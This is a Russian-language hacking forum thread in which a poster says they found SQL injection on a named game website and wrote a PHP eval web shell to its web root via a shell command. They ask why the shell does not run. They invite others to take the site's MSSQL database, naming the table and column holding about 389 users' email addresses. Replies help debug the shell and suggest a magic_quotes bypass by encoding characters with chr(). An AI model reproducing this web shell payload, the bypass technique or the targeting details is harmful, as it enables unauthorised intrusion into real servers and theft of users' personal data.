|
Сломал сайт, залил Php файл, а ничё не работает!
Хай! Вот нащёл сайт!
_http://jeux-mu-sacre-online.no-ip.org/ Нащёл в нём SQL Injection, выполнил команду echo "<? eval(stripslashes($_GET[c])); ?>" > D:/wamp/www/info.php Файл создался, но... http://jeux-mu-sacre-online.no-ip.org/info.php?c=echo '123'; И ничего... В общем если кому удасться разобраться в чём проблема, раскажите :) А БД можете себе брать, тама MSSQL в БД: MuOnline Таблица: MEMB_INFO Колонка: mail_addr Хранятся мыльники юзверей (я так понимаю их тама только 389 :( ) В общем очень интересно где скривили мои руки, почему сервер не слушает меня :mad: |
А ты посмотри в сорсаx что делается ;) - "<? eval(stripslashes($_GET[c])); ?>" так в кавычкаx и осталось!!!
|
ссылку на саму sql Injection!В студию.
|
sunb0rn, а без ковычек никак, ктомуже они на PHP никак не действуют! Как я буду использовать echo text > file если там символ > и в <? , ?> тоже эти символы...
Я так много раз делал, всё работало, а вот тут нехочет... |
sunb0rn, php код между тегами <? ?> в данном случае. все что до него и после - не важно.
Ponchik, посмотри код страницы) пхп не обрабатывается. |
Почему не обрабатывается... Еслиб не обрабатывался, нобы и выводил весь код страницы, а так всё фурычит... Странно... Мистикааааа! В общем можно забить на этот сайт...
|
|
Позволь поспорить
http://img177.imageshack.us/img177/3940/screenshot0pg1.jpg |
я про сайт :d
|
если magic_quotes=on то нихуя работать не будет. Можно обойти например echo(chr(0x56))
|
| Время: 13:07 |